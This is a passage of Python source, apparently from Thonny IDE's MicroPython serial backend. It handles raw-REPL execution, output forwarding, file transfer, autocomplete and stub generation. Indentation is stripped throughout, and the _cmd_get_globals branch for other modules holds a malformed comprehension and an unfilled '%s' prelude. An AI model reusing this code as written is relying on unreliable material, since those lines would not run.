self._startup_time = time.time()
self._interrupt_suggestion_given = False
self._writing_lock = Lock()
try:
self._prepare(clean)
self._mainloop()
except ConnectionClosedException as e:
self._on_connection_closed(e)
except Exception:
logger.exception("Crash in backend")
traceback.print_exc()
def _prepare(self, clean):
if clean:
self._interrupt_to_raw_prompt()
self._clear_environment()
else:
self._connection.write(RAW_MODE_CMD)
self._forward_output_until_active_prompt()
self._cwd = self._fetch_cwd()
self._welcome_text = self._fetch_welcome_text()
self._builtin_modules = self._fetch_builtin_modules()
self._builtins_info = self._fetch_builtins_info()
self._send_ready_message()
def _mainloop(self):
while True:
self._check_for_connection_errors()
try:
cmd = self._command_queue.get(timeout=0.1)
except Empty:
                # No command in the queue, but maybe a thread produced output meanwhile
                # or the user reset the device
self._forward_unexpected_output()
continue
if isinstance(cmd, InputSubmission):
self._submit_input(cmd.data)
elif isinstance(cmd, EOFCommand):
self._soft_reboot(False)
else:
self.handle_command(cmd)
def _fetch_welcome_text(self):
self._connection.write(NORMAL_MODE_CMD)
welcome_text = self._connection.read_until(NORMAL_PROMPT).strip(b"\r\n >")
if os.name != "nt":
welcome_text = welcome_text.replace(b"\r\n", b"\n")
# Go back to raw prompt
self._connection.write(RAW_MODE_CMD)
self._connection.read_until(FIRST_RAW_PROMPT)
return welcome_text.decode(ENCODING, errors="replace")
def _fetch_uname(self):
res = self._evaluate("__thonny_os.uname()", prelude="import os as __thonny_os")
return {
"sysname": res[0],
"nodename": res[1],
"release": res[2],
"version": res[3],
"machine": res[4],
}
def _fetch_builtin_modules(self):
out = self._execute_and_capture_output("help('modules')")
if out is None:
self._send_error_message(
"Could not query builtin modules. Code completion may not work properly."
)
return FALLBACK_BUILTIN_MODULES
modules_str_lines = out.strip().splitlines()
last_line = modules_str_lines[-1].strip()
        if last_line.count(" ") > 0 and "  " not in last_line and "\t" not in last_line:
# probably something like "plus any modules on the filesystem"
# (can be in different languages)
modules_str_lines = modules_str_lines[:-1]
modules_str = (
" ".join(modules_str_lines)
.replace("/__init__", "")
.replace("__main__", "")
.replace("/", ".")
)
return modules_str.split()
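    # Hypothetical example of the cleanup above: if help('modules') printed
    #     __main__          micropython       uasyncio/__init__ uos
    #     Plus any modules on the filesystem
    # the last line (single spaces only, no column padding) would be dropped,
    # "/__init__" and "__main__" stripped, and "/" turned into ".", yielding
    # ['micropython', 'uasyncio', 'uos'].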
def _fetch_builtins_info(self):
"""
for p in self._get_api_stubs_path():
builtins_file = os.path.join(p, "__builtins__.py")
if os.path.exists(builtins_file):
return parse_api_information(builtins_file)
"""
path = os.path.join(self._api_stubs_path, "builtins.py")
if os.path.exists(path):
return parse_api_information(path)
else:
return {}
def _fetch_cwd(self):
return self._evaluate(
"__thonny_os.getcwd() if hasattr(__thonny_os, 'getcwd') else ''",
prelude="import os as __thonny_os",
)
def _send_ready_message(self):
self.send_message(ToplevelResponse(welcome_text=self._welcome_text, cwd=self._cwd))
def _check_send_inline_progress(self, cmd, value, maximum, description=None):
assert "id" in cmd
prev_time = self._progress_times.get(cmd["id"], 0)
if value != maximum and time.time() - prev_time < 0.2:
# Don't notify too often
return
else:
self._progress_times[cmd["id"]] = time.time()
if description is None:
description = cmd.get("description", "Working...")
self.send_message(
BackendEvent(
event_type="InlineProgress",
command_id=cmd["id"],
value=value,
maximum=maximum,
description=description,
)
)
def _interrupt_to_raw_prompt(self):
# NB! Sometimes disconnecting and reconnecting (on macOS?)
# too quickly causes anomalies. See CalliopeMiniProxy for more details
discarded_bytes = b""
for delay in [0.05, 0.5, 0.1, 1.0, 3.0, 5.0]:
# Interrupt several times, because with some drivers first interrupts seem to vanish
if delay >= 1:
self._show_error(
"Could not enter REPL. Trying again with %d second waiting time..." % delay
)
self._connection.reset_output_buffer()
self._connection.write(INTERRUPT_CMD)
self._connection.write(RAW_MODE_CMD)
time.sleep(delay)
discarded_bytes += self._connection.read_all()
if discarded_bytes.endswith(FIRST_RAW_PROMPT) or discarded_bytes.endswith(b"\r\n>"):
break
else:
max_tail_length = 500
if len(discarded_bytes) > max_tail_length:
discarded_bytes_str = (
"[skipping %d bytes] ..." % (len(discarded_bytes) - max_tail_length)
) + repr(discarded_bytes[:-max_tail_length])
else:
discarded_bytes_str = repr(discarded_bytes)
self._show_error(
"Could not enter REPL. Giving up. Read bytes:\n"
+ discarded_bytes_str
+ "\n\nYour options:\n\n"
+ " - check connection properties;\n"
+ " - make sure the device has suitable firmware;\n"
+ " - make sure the device is not in bootloader mode;\n"
+ " - reset the device and try again;\n"
+ " - try other serial clients (Putty, TeraTerm, screen, ...);\n"
+ " - ask for help in Thonny's forum or issue tracker."
)
sys.exit()
def _soft_reboot(self, side_command):
if side_command:
self._interrupt_to_raw_prompt()
# Need to go to normal mode. MP doesn't run user code in raw mode
# (CP does, but it doesn't hurt to do it there as well)
self._connection.write(NORMAL_MODE_CMD)
self._connection.read_until(NORMAL_PROMPT)
self._connection.write(SOFT_REBOOT_CMD)
if not side_command:
self._forward_output_until_active_prompt()
self.send_message(ToplevelResponse(cwd=self._cwd))
def _read_commands(self):
"works in separate thread"
while True:
line = sys.stdin.readline()
if line == "":
logger.info("Read stdin EOF")
sys.exit()
cmd = parse_message(line)
if isinstance(cmd, InterruptCommand):
# This is a priority command and will be handled right away
self._interrupt_in_command_reading_thread()
else:
self._command_queue.put(cmd)
def _interrupt_in_command_reading_thread(self):
with self._writing_lock:
# don't interrupt while command or input is being written
self._connection.write(INTERRUPT_CMD)
time.sleep(0.1)
self._connection.write(INTERRUPT_CMD)
time.sleep(0.1)
self._connection.write(INTERRUPT_CMD)
print("sent interrupt")
def handle_command(self, cmd):
assert isinstance(cmd, (ToplevelCommand, InlineCommand))
if "local_cwd" in cmd:
self._local_cwd = cmd["local_cwd"]
def create_error_response(**kw):
if not "error" in kw:
kw["error"] = traceback.format_exc()
if isinstance(cmd, ToplevelCommand):
return ToplevelResponse(command_name=cmd.name, **kw)
else:
return InlineResponse(command_name=cmd.name, **kw)
handler = getattr(self, "_cmd_" + cmd.name, None)
if handler is None:
response = create_error_response(error="Unknown command: " + cmd.name)
else:
try:
response = handler(cmd)
except SystemExit:
# Must be caused by Thonny or plugins code
if isinstance(cmd, ToplevelCommand):
traceback.print_exc()
response = create_error_response(SystemExit=True)
except UserError as e:
sys.stderr.write(str(e) + "\n")
response = create_error_response()
except KeyboardInterrupt:
response = create_error_response(error="Interrupted", interrupted=True)
except ProtocolError as e:
self._send_output(
"THONNY FAILED TO EXECUTE %s (%s)\n" % (cmd.name, e.message), "stderr"
)
self._send_output("CAPTURED DATA: %r\n" % e.captured, "stderr")
self._send_output("TRYING TO RECOVER ...\n", "stderr")
# TODO: detect when there is no output for long time and suggest interrupt
self._forward_output_until_active_prompt("stdout")
response = create_error_response(error=e.message)
except Exception:
_report_internal_error()
response = create_error_response(context_info="other unhandled exception")
if response is None:
response = {}
if response is False:
# Command doesn't want to send any response
return
elif isinstance(response, dict):
if isinstance(cmd, ToplevelCommand):
response = ToplevelResponse(command_name=cmd.name, **response)
elif isinstance(cmd, InlineCommand):
response = InlineResponse(cmd.name, **response)
if "id" in cmd and "command_id" not in response:
response["command_id"] = cmd["id"]
debug("cmd: " + str(cmd) + ", respin: " + str(response))
self.send_message(response)
def _submit_input(self, cdata: str) -> None:
# TODO: what if there is a previous unused data waiting
assert self._connection.outgoing_is_empty()
assert cdata.endswith("\n")
if not cdata.endswith("\r\n"):
# submission is done with CRLF
cdata = cdata[:-1] + "\r\n"
bdata = cdata.encode(ENCODING)
with self._writing_lock:
self._connection.write(bdata)
# Try to consume the echo
try:
echo = self._connection.read(len(bdata))
except queue.Empty:
# leave it.
logging.warning("Timeout when reading input echo")
return
if echo != bdata:
# because of autoreload? timing problems? interruption?
# Leave it.
logging.warning("Unexpected echo. Expected %s, got %s" % (bdata, echo))
self._connection.unread(echo)
def send_message(self, msg):
if "cwd" not in msg:
msg["cwd"] = self._cwd
sys.stdout.write(serialize_message(msg) + "\n")
sys.stdout.flush()
def _send_output(self, data, stream_name):
if not data:
return
if isinstance(data, bytes):
data = data.decode(ENCODING, errors="replace")
data = self._transform_output(data)
msg = BackendEvent(event_type="ProgramOutput", stream_name=stream_name, data=data)
self.send_message(msg)
def _send_error_message(self, msg):
self._send_output("\n" + msg + "\n", "stderr")
def _transform_output(self, data):
# Any keypress wouldn't work
return data.replace(
"Press any key to enter the REPL. Use CTRL-D to reload.",
"Press Ctrl-C to enter the REPL. Use CTRL-D to reload.",
)
def _ensure_raw_propmt(self):
# similar to _interrupt_to_raw_prompt, but assumes we are already in a prompt
self._forward_unexpected_output()
self._connection.write(RAW_MODE_CMD)
prompt = self._connection.read_until(FIRST_RAW_PROMPT_SUFFIX, 1, True)
if not prompt.endswith(FIRST_RAW_PROMPT_SUFFIX):
raise TimeoutError("Could not ensure raw prompt")
def _submit_code_to_raw_repl(self, script):
assert script # otherwise EOT produces soft reboot
self._ensure_raw_propmt()
# send command
with self._writing_lock:
self._connection.write(script.encode(ENCODING) + EOT)
debug("Wrote " + script + "\n--------\n")
# fetch command confirmation
confirmation = self._connection.soft_read(2, timeout=WAIT_OR_CRASH_TIMEOUT)
if confirmation != OK:
raise ProtocolError(
"Could not read command confirmation", confirmation + self._connection.read_all()
)
debug("GOTOK")
def _execute_in_raw_mode(self, script, timeout, capture_stdout):
"""Ensures raw prompt and submits the script.
Returns (out, value_repr, err) if there are no problems, ie. all parts of the
output are present and it reaches active raw prompt.
Otherwise raises ProtocolError.
Expected output after submitting the command and reading the confirmation is following:
- User code:
stdout
EOT
stderr
EOT
RAW_PROMPT
- Thonny management/evaluation commands:
stdout (rare, eg. produced by unorthodox __repr__ methods)
EOT + VALUE_REPR_START + value_repr + VALUE_REPR_END
EOT
EOT
RAW_PROMPT
        The execution may block. In this case the user should do something (eg. provide
        required input or issue an interrupt). The UI should suggest an interrupt in the case
        of Thonny commands.
"""
self._submit_code_to_raw_repl(script)
# The part until first EOT is supposed to be stdout output.
# If capture is not required then it is produced by user code,
# ie. the output produced should be forwarded as it appears.
if capture_stdout:
stdout_block = self._connection.soft_read_until(EOT, timeout=timeout)
if stdout_block.endswith(EOT):
out = stdout_block[: -len(EOT)]
else:
raise ProtocolError("Captured output was not terminated properly", stdout_block)
else:
out = b""
terminator = self._forward_output_until_eot_or_active_propmt()
if terminator != EOT:
raise ProtocolError("Incremental output was not terminated properly", terminator)
stdout_block = out + terminator
# Remaining part must contain value repr and empty stderr or (possibly empty) stderr alone.
# Value repr followed by non-empty stderr (eg. by cleanup code) is considered a protocol
# error. This part can be read as one block. It should appear quite quickly as the first
# EOT is already present.
final_terminator = EOT + RAW_PROMPT
value_err_block = self._connection.soft_read_until(final_terminator, WAIT_OR_CRASH_TIMEOUT)
if not value_err_block.endswith(final_terminator):
raise ProtocolError(
"Value/stderr was not terminated properly", stdout_block + value_err_block
)
trimmed_value_err_block = value_err_block[: -len(final_terminator)]
# trimmed_value_err_block may or may not contain value-repr block
if trimmed_value_err_block.count(EOT) == 0:
value_repr = None
err = trimmed_value_err_block
elif (
trimmed_value_err_block.count(EOT) == 1
and trimmed_value_err_block.startswith(VALUE_REPR_START)
and trimmed_value_err_block.endswith(VALUE_REPR_END + EOT)
):
value_repr = trimmed_value_err_block[
len(VALUE_REPR_START) : -len(VALUE_REPR_END + EOT)
].decode(ENCODING)
err = b""
else:
raise ProtocolError(
"Unexpected structure in value/stderr block", stdout_block + value_err_block
)
# The final condition -- the raw prompt we reached must be active prompt,
# ie. it must be the end of the output
remainder = self._connection.soft_read(1, timeout=0.01) + self._connection.read_all()
if remainder:
raise ProtocolError(
"Unexpected output after raw prompt", stdout_block + value_err_block + remainder
)
return out.decode(ENCODING), value_repr, err.decode(ENCODING)
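    # Worked example (hypothetical byte streams, following the layout in the
    # docstring above): for user code run with capture_stdout=True, a stream of
    #     b"hello\r\n" + EOT + b"" + EOT + RAW_PROMPT
    # splits into out="hello\r\n", value_repr=None, err="", while an evaluation
    # command run with capture_stdout=False that produces
    #     EOT + b"<repr>42</repr>" + EOT + EOT + RAW_PROMPT
    # yields out="", value_repr="42", err="".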
def _execute_without_errors(self, script):
"""Meant for management tasks. stdout will be unexpected but tolerated.
stderr will cause exception"""
result = self._evaluate("True", prelude=script)
assert result is True
def _evaluate_to_repr(self, expr, prelude="", cleanup="", timeout=SECONDS_IN_YEAR):
"""Uses raw-REPL to evaluate and print the repr of given expression.
Side effects before printing the repr always get forwarded.
Returns the repr only if everything goes according to the plan.
Raises ProtocolError if anything looks fishy.
"""
script = ""
if prelude:
script += prelude + "\n"
script += "print(%r, repr(%s), sep='', end=%r)" % (
(EOT + VALUE_REPR_START).decode(),
expr,
VALUE_REPR_END.decode(),
)
if cleanup:
script += "\n" + cleanup
stdout, value_repr, err = self._execute_in_raw_mode(
script, timeout=timeout, capture_stdout=False
)
assert not stdout
if value_repr is None:
raise ProtocolError("Could not find value repr", err)
elif err:
raise ProtocolError(
"Evaluated with errors",
EOT + VALUE_REPR_START + value_repr + VALUE_REPR_END + EOT + err,
)
else:
return value_repr
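    # For a hypothetical expr "2+2" with no prelude or cleanup, the script
    # generated above is:
    #     print('\x04<repr>', repr(2+2), sep='', end='</repr>')
    # so the device emits EOT, the VALUE_REPR_START marker, the repr "4" and
    # the VALUE_REPR_END marker, which _execute_in_raw_mode then extracts.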
def _execute_and_capture_output(self, script, timeout=5):
"""Executes script in raw repl, captures stdout and consumes terminators.
Returns stdout if everything goes well.
Raises ProtocolError if anything looks fishy.
"""
stdout, value_repr, err = self._execute_in_raw_mode(
script, timeout=timeout, capture_stdout=True
)
if value_repr is not None:
raise ProtocolError(
"Unexpected value repr",
stdout + EOT + VALUE_REPR_START + value_repr + VALUE_REPR_END + EOT + err,
)
elif err:
raise ProtocolError("Captured output with errors", stdout + EOT + err)
else:
return stdout
def _execute_user_code(self, script):
"""Executes the code in raw REPL and forwards output / err,
        if all goes according to protocol. Raises ProtocolError otherwise."""
stdout, value_repr, err = self._execute_in_raw_mode(
script, timeout=SECONDS_IN_YEAR, capture_stdout=False
)
if value_repr is not None:
raise ProtocolError(
"Unexpected value repr",
stdout + EOT + VALUE_REPR_START + value_repr + VALUE_REPR_END + EOT + err,
)
else:
self._send_output(stdout, "stdout")
self._send_output(err, "stderr")
def _evaluate(self, expr, prelude="", cleanup=""):
value_repr = self._evaluate_to_repr(expr, prelude, cleanup)
return ast.literal_eval(value_repr)
def _forward_output_until_active_prompt(self, stream_name="stdout"):
"""Used for finding initial prompt or forwarding problematic output
in case of parse errors"""
while True:
terminator = self._forward_output_until_eot_or_active_propmt(stream_name)
if terminator in (NORMAL_PROMPT, RAW_PROMPT, FIRST_RAW_PROMPT):
return terminator
else:
self._send_output(terminator, "stdout")
def _forward_output_until_eot_or_active_propmt(self, stream_name="stdout"):
"""Meant for incrementally forwarding stdout from user statements,
scripts and soft-reboots. Also used for forwarding side-effect output from
expression evaluations and for capturing help("modules") output.
In these cases it is expected to arrive to an EOT.
Also used for initial prompt searching or for recovering from a protocol error.
In this case it must work until active prompt.
The code may have been submitted in any of the REPL modes or
automatically via (soft-)reset.
NB! The processing may end in normal mode even if the command was started
in raw mode (eg. when user presses reset during processing in some devices)!
The processing may also end in FIRST_RAW_REPL, when it was started in
normal REPL and Ctrl+A was issued during processing (ie. before Ctrl+C in
this example):
6
7
8
9
10
Traceback (most recent call last):
File "main.py", line 5, in <module>
KeyboardInterrupt:
MicroPython v1.11-624-g210d05328 on 2019-12-09; ESP32 module with ESP32
Type "help()" for more information.
>>>
raw REPL; CTRL-B to exit
>
(Preceding output does not contain EOT)
Note that this Ctrl+A may have been issued even before Thonny connected to
the device.
Note that interrupt does not affect the structure of the output -- it is
presented just like any other exception.
        The method forwards the captured output via _send_output and returns
        EOT, NORMAL_PROMPT or FIRST_RAW_PROMPT, depending on which terminator ended the processing.
The terminating EOT may be either the first EOT from normal raw-REPL
output or the starting EOT from Thonny expression (or, in principle, even
the second raw-REPL EOT or terminating Thonny expression EOT)
-- the caller will do the interpretation.
        Because of the special role of EOT and NORMAL_PROMPT, we assume user code
        will not output these. If it does, processing will break.
TODO: Experiment with this!
Output produced by background threads (eg. in WiPy ESP32) cause even more difficulties,
because it becomes impossible to say whether we are at prompt and output
is from another thread or the main thread is still running.
For now I'm ignoring these problems and assume all output comes from the main thread.
"""
INCREMENTAL_OUTPUT_BLOCK_CLOSERS = re.compile(
b"|".join(map(re.escape, [LF, EOT, NORMAL_PROMPT, FIRST_RAW_PROMPT]))
)
pending = b""
while True:
# There may be an input submission waiting
# and we can't progress without resolving it first
self._check_for_side_commands()
# Prefer whole lines, but allow also incremental output to single line
# Note that here I'm not looking for non-first raw prompt, because this
# is always preceded by EOT.
new_data = self._connection.soft_read_until(
INCREMENTAL_OUTPUT_BLOCK_CLOSERS, timeout=0.05
)
if not new_data:
# In case we are still waiting for the first bits after connecting ...
if (
self._connection.num_bytes_received == 0
and not self._interrupt_suggestion_given
and time.time() - self._startup_time > 1.5
):
self._show_error(
"\n"
+ "Device is busy or does not respond. Your options:\n\n"
+ " - wait until it completes current work;\n"
+ " - use Ctrl+C to interrupt current work;\n"
+ " - use Stop/Restart to interrupt more and enter REPL.\n"
)
self._interrupt_suggestion_given = True
continue
pending += new_data
if pending.endswith(EOT):
self._send_output(pending[: -len(EOT)], stream_name)
return EOT
elif pending.endswith(LF):
self._send_output(pending, stream_name)
pending = b""
elif pending.endswith(NORMAL_PROMPT) or pending.endswith(FIRST_RAW_PROMPT):
# This looks like prompt (or its prefix).
# Make sure it is not followed by anything.
# Note that in this context the prompt means something is wrong
# (EOT would have been the happy path), so no need to hurry.
# The only case where this path is happy path is just after connecting.
follow_up = self._connection.soft_read(1, timeout=0.5)
if follow_up:
# Nope, the prompt is not active.
# (Actually it may be that a background thread has produced this follow up,
# but this would be too hard to consider.)
# Don't output yet, because the follow up may turn into another prompt
# and they can be captured all together.
pending += follow_up
else:
# let's hope it is an active prompt
if pending.endswith(NORMAL_PROMPT):
terminator = NORMAL_PROMPT
else:
terminator = FIRST_RAW_PROMPT
# Strip all trailing prompts
out = pending
while True:
if out.endswith(NORMAL_PROMPT):
out = out[: -len(NORMAL_PROMPT)]
elif out.endswith(FIRST_RAW_PROMPT):
out = out[: -len(FIRST_RAW_PROMPT)]
else:
break
self._send_output(out, stream_name)
return terminator
elif ends_overlap(pending, NORMAL_PROMPT) or ends_overlap(pending, FIRST_RAW_PROMPT):
# Maybe we have a prefix of the prompt and the rest is still coming?
follow_up = self._connection.soft_read(1, timeout=0.1)
if not follow_up:
# most likely not a Python prompt, let's forget about it
self._send_output(pending, stream_name)
pending = b""
else:
# Let's withhold this for now
pending += follow_up
else:
# No EOT or prompt in sight.
# Output and keep working.
self._send_output(pending, stream_name)
pending = b""
def _forward_unexpected_output(self, stream_name="stdout"):
"Invoked between commands"
data = self._connection.read_all()
at_prompt = False
while data.endswith(NORMAL_PROMPT) or data.endswith(FIRST_RAW_PROMPT):
            # looks like the device was reset
at_prompt = True
if data.endswith(NORMAL_PROMPT):
terminator = NORMAL_PROMPT
else:
terminator = FIRST_RAW_PROMPT
# hide the prompt from the output ...
data = data[: -len(terminator)]
self._send_output(data.decode(ENCODING, "replace"), stream_name)
if at_prompt:
# ... and recreate Thonny prompt
self.send_message(ToplevelResponse())
self._check_for_connection_errors()
def _clear_environment(self):
# TODO: Ctrl+D in raw repl is perfect for MicroPython
# but on CircuitPython it runs main.py
# TODO: which is better:
# self._execute_async(dedent("""
# for name in globals():
# if not name.startswith("__"):
# del globals()[name]
# """).strip())
# or
self._execute_without_errors("globals().clear(); __name__ = '__main__'")
def _check_for_side_commands(self):
# most likely the queue is empty
if self._command_queue.empty():
return
postponed = []
while not self._command_queue.empty():
cmd = self._command_queue.get()
if isinstance(cmd, InputSubmission):
self._submit_input(cmd.data)
elif isinstance(cmd, EOFCommand):
self._soft_reboot(True)
else:
postponed.append(cmd)
# put back postponed commands
while postponed:
self._command_queue.put(postponed.pop(0))
def _supports_directories(self):
# NB! make sure self._cwd is queried first
return bool(self._cwd)
def _connected_to_microbit(self):
return "micro:bit" in self._welcome_text.lower()
def _cmd_cd(self, cmd):
if len(cmd.args) == 1:
if not self._supports_directories():
raise UserError("This device doesn't have directories")
path = cmd.args[0]
self._execute_without_errors("import os as __thonny_os; __thonny_os.chdir(%r)" % path)
self._cwd = self._fetch_cwd()
return {}
else:
raise UserError("%cd takes one parameter")
def _cmd_Run(self, cmd):
# self._clear_environment()
assert cmd.get("source")
self._execute_user_code(cmd["source"])
return {}
def _cmd_execute_source(self, cmd):
try:
# Try to parse as expression
ast.parse(cmd.source, mode="eval")
# If it didn't fail then source is an expression
value_repr = self._evaluate_to_repr(cmd.source)
if value_repr is None:
value_repr = repr(None)
return {"value_info": ValueInfo(0, value_repr)}
except SyntaxError:
# source is a statement (or invalid syntax)
self._execute_user_code(cmd.source)
return {}
def _cmd_execute_system_command(self, cmd):
# Can't use stdin, because a thread is draining it
execute_system_command(cmd, cwd=self._local_cwd, disconnect_stdin=True)
def _cmd_get_globals(self, cmd):
if cmd.module_name == "__main__":
globs = self._evaluate(
"{name : repr(value) for (name, value) in globals().items() if not name.startswith('__')}"
)
else:
globs = self._evaluate(
"{name : repr(getattr(__mod_for_globs, name)) in dir(__mod_for_globs) if not name.startswith('__')}",
prelude="import %s as __mod_for_globs",
)
return {"module_name": cmd.module_name, "globals": globs}
def _cmd_get_dirs_child_data(self, cmd):
if self._supports_directories():
data = self._get_dirs_child_data_generic(cmd["paths"])
dir_separator = "/"
else:
assert cmd["paths"] == {""}, "Bad command: " + repr(cmd)
sizes = self._get_microbit_file_sizes()
root_data = {name: {"kind": "file", "size": size} for (name, size) in sizes.items()}
data = {"": root_data}
dir_separator = ""
return {"node_id": cmd["node_id"], "dir_separator": dir_separator, "data": data}
def _cmd_get_fs_info(self, cmd):
return self._get_fs_info(cmd.path)
def _cmd_write_file(self, cmd):
def generate_blocks(content_bytes, block_size):
for i in range(0, len(content_bytes), block_size):
yield content_bytes[i : i + block_size]
self._write_file(generate_blocks(cmd["content_bytes"], BUFFER_SIZE), cmd["path"])
return InlineResponse(
command_name="write_file", path=cmd["path"], editor_id=cmd.get("editor_id")
)
def _cmd_delete(self, cmd):
assert cmd.paths
paths = sorted(cmd.paths, key=lambda x: len(x), reverse=True)
try:
self._delete_via_serial(paths)
except Exception as e:
if "read-only" in str(e).lower():
self._delete_via_mount(paths)
self._sync_all_filesystems()
def _internal_path_to_mounted_path(self, path):
mount_path = self._get_fs_mount()
if mount_path is None:
return None
flash_prefix = self._get_flash_prefix()
if not path.startswith(flash_prefix):
return None
path_suffix = path[len(flash_prefix) :]
return os.path.join(mount_path, os.path.normpath(path_suffix))
def _cmd_read_file(self, cmd):
try:
content_bytes = b"".join(self._read_file(cmd["path"]))
error = None
except Exception as e:
_report_internal_error()
error = str(e)
content_bytes = None
return {"content_bytes": content_bytes, "path": cmd["path"], "error": error}
def _cmd_download(self, cmd):
total_size = 0
completed_files_size = 0
remote_files = self._list_remote_files_with_info(cmd["source_paths"])
target_dir = cmd["target_dir"].rstrip("/").rstrip("\\")
download_items = []
for file in remote_files:
total_size += file["size"]
# compute filenames (and subdirs) in target_dir
# relative to the context of the user selected items
assert file["path"].startswith(file["original_context"])
path_suffix = file["path"][len(file["original_context"]) :].strip("/").strip("\\")
target_path = os.path.join(target_dir, os.path.normpath(path_suffix))
download_items.append(dict(source=file["path"], target=target_path, size=file["size"]))
if not cmd["allow_overwrite"]:
targets = [item["target"] for item in download_items]
existing_files = list(filter(os.path.exists, targets))
if existing_files:
return {
"existing_files": existing_files,
"source_paths": cmd["source_paths"],
"target_dir": cmd["target_dir"],
"description": cmd["description"],
}
def notify(current_file_progress):
self._check_send_inline_progress(
cmd, completed_files_size + current_file_progress, total_size
)
# replace the indeterminate progressbar with determinate as soon as possible
notify(0)
for item in download_items:
written_bytes = self._download_file(item["source"], item["target"], notify)
assert written_bytes == item["size"]
completed_files_size += item["size"]
def _cmd_upload(self, cmd):
completed_files_size = 0
local_files = self._list_local_files_with_info(cmd["source_paths"])
target_dir = cmd["target_dir"]
assert target_dir.startswith("/") or not self._supports_directories()
assert not target_dir.endswith("/") or target_dir == "/"
upload_items = []
for file in local_files:
# compute filenames (and subdirs) in target_dir
# relative to the context of the user selected items
assert file["path"].startswith(file["original_context"])
path_suffix = file["path"][len(file["original_context"]) :].strip("/").strip("\\")
target_path = self._join_remote_path_parts(target_dir, to_remote_path(path_suffix))
upload_items.append(dict(source=file["path"], target=target_path, size=file["size"]))
if not cmd["allow_overwrite"]:
targets = [item["target"] for item in upload_items]
existing_files = self._get_existing_remote_files(targets)
if existing_files:
return {
"existing_files": existing_files,
"source_paths": cmd["source_paths"],
"target_dir": cmd["target_dir"],
"description": cmd["description"],
}
total_size = sum([item["size"] for item in upload_items])
def notify(current_file_progress):
self._check_send_inline_progress(
cmd, completed_files_size + current_file_progress, total_size
)
# replace the indeterminate progressbar with determinate as soon as possible
notify(0)
for item in upload_items:
written_bytes = self._upload_file(item["source"], item["target"], notify)
assert written_bytes == item["size"]
completed_files_size += item["size"]
def _cmd_mkdir(self, cmd):
assert self._supports_directories()
assert cmd.path.startswith("/")
self._makedirs(cmd.path)
self._sync_all_filesystems()
def _cmd_editor_autocomplete(self, cmd):
# template for the response
result = dict(source=cmd.source, row=cmd.row, column=cmd.column)
try:
script = jedi.Script(cmd.source, cmd.row, cmd.column, sys_path=[self._api_stubs_path])
completions = script.completions()
result["completions"] = self._filter_completions(completions)
except Exception:
traceback.print_exc()
result["error"] = "Autocomplete error"
return result
def _filter_completions(self, completions):
# filter out completions not applicable to MicroPython
result = []
for completion in completions:
if completion.name.startswith("__"):
continue
if completion.parent() and completion.full_name:
parent_name = completion.parent().name
name = completion.name
root = completion.full_name.split(".")[0]
# jedi proposes names from CPython builtins
if root in self._builtins_info and name not in self._builtins_info[root]:
continue
if parent_name == "builtins" and name not in self._builtins_info:
continue
result.append({"name": completion.name, "complete": completion.complete})
return result
def _cmd_shell_autocomplete(self, cmd):
source = cmd.source
# TODO: combine dynamic results and jedi results
if source.strip().startswith("import ") or source.strip().startswith("from "):
# this needs the power of jedi
response = {"source": cmd.source}
try:
# at the moment I'm assuming source is the code before cursor, not whole input
lines = source.split("\n")
script = jedi.Script(
source, len(lines), len(lines[-1]), sys_path=[self._api_stubs_path]
)
completions = script.completions()
response["completions"] = self._filter_completions(completions)
except Exception:
traceback.print_exc()
response["error"] = "Autocomplete error"
return response
else:
# use live data
match = re.search(
r"(\w+\.)*(\w+)?$", source
) # https://github.com/takluyver/ubit_kernel/blob/master/ubit_kernel/kernel.py
if match:
prefix = match.group()
if "." in prefix:
obj, prefix = prefix.rsplit(".", 1)
names = self._evaluate(
"dir({}) if '{}' in locals() or '{}' in globals() else []".format(
obj, obj, obj
)
)
else:
names = self._evaluate("dir()")
else:
names = []
prefix = ""
completions = []
# prevent TypeError (iterating over None)
names = names if names else []
for name in names:
if name.startswith(prefix) and not name.startswith("__"):
completions.append({"name": name, "complete": name[len(prefix) :]})
return {"completions": completions, "source": source}
def _cmd_dump_api_info(self, cmd):
"For use during development of the plug-in"
self._execute_without_errors(
dedent(
"""
def __get_object_atts(obj):
result = []
errors = []
for name in dir(obj):
try:
val = getattr(obj, name)
result.append((name, repr(val), repr(type(val))))
except BaseException as e:
errors.append("Couldn't get attr '%s' from object '%r', Err: %r" % (name, obj, e))
return (result, errors)
"""
)
)
for module_name in sorted(self._fetch_builtin_modules()):
if (
not module_name.startswith("_")
and not module_name.startswith("adafruit")
# and not module_name == "builtins"
):
file_name = os.path.join(
self._api_stubs_path, module_name.replace(".", "/") + ".py"
)
self._dump_module_stubs(module_name, file_name)
def _dump_module_stubs(self, module_name, file_name):
self._execute_without_errors("import {0}".format(module_name))
os.makedirs(os.path.dirname(file_name), exist_ok=True)
with io.open(file_name, "w", encoding="utf-8", newline="\n") as fp:
if module_name not in [
"webrepl",
"_webrepl",
"gc",
"http_client",
"http_client_ssl",
"http_server",
"framebuf",
"example_pub_button",
"flashbdev",
]:
self._dump_object_stubs(fp, module_name, "")
def _dump_object_stubs(self, fp, object_expr, indent):
if object_expr in [
"docs.conf",
"pulseio.PWMOut",
"adafruit_hid",
"upysh",
# "webrepl",
# "gc",
# "http_client",
# "http_server",
]:
print("SKIPPING problematic name:", object_expr)
return
print("DUMPING", indent, object_expr)
items, errors = self._evaluate("__get_object_atts({0})".format(object_expr))
if errors:
print("ERRORS", errors)
for name, rep, typ in sorted(items, key=lambda x: x[0]):
if name.startswith("__"):
continue
print("DUMPING", indent, object_expr, name)
self._send_text_to_shell(" * " + name + " : " + typ, "stdout")
if typ in ["<class 'function'>", "<class 'bound_method'>"]:
fp.write(indent + "def " + name + "():\n")
fp.write(indent + " pass\n\n")
elif typ in ["<class 'str'>", "<class 'int'>", "<class 'float'>"]:
fp.write(indent + name + " = " + rep + "\n")
elif typ == "<class 'type'>" and indent == "":
# full expansion only on toplevel
fp.write("\n")
fp.write(indent + "class " + name + ":\n") # What about superclass?
fp.write(indent + " ''\n")
self._dump_object_stubs(fp, "{0}.{1}".format(object_expr, name), indent + " ")
else:
# keep only the name
fp.write(indent + name + " = None\n")
def _read_file(self, path):
# TODO: read from mount when possible
# file_size = self._get_file_size(path)
block_size = 512
hex_mode = self.should_hexlify(path)
self._execute_without_errors("__thonny_fp = open(%r, 'rb')" % path)
if hex_mode:
self._execute_without_errors("from binascii import hexlify as __temp_hexlify")
while True:
if hex_mode:
block = binascii.unhexlify(
self._evaluate("__temp_hexlify(__thonny_fp.read(%s))" % block_size)
)
else:
block = self._evaluate("__thonny_fp.read(%s)" % block_size)
if block:
yield block
if len(block) < block_size:
break
self._execute_without_errors(
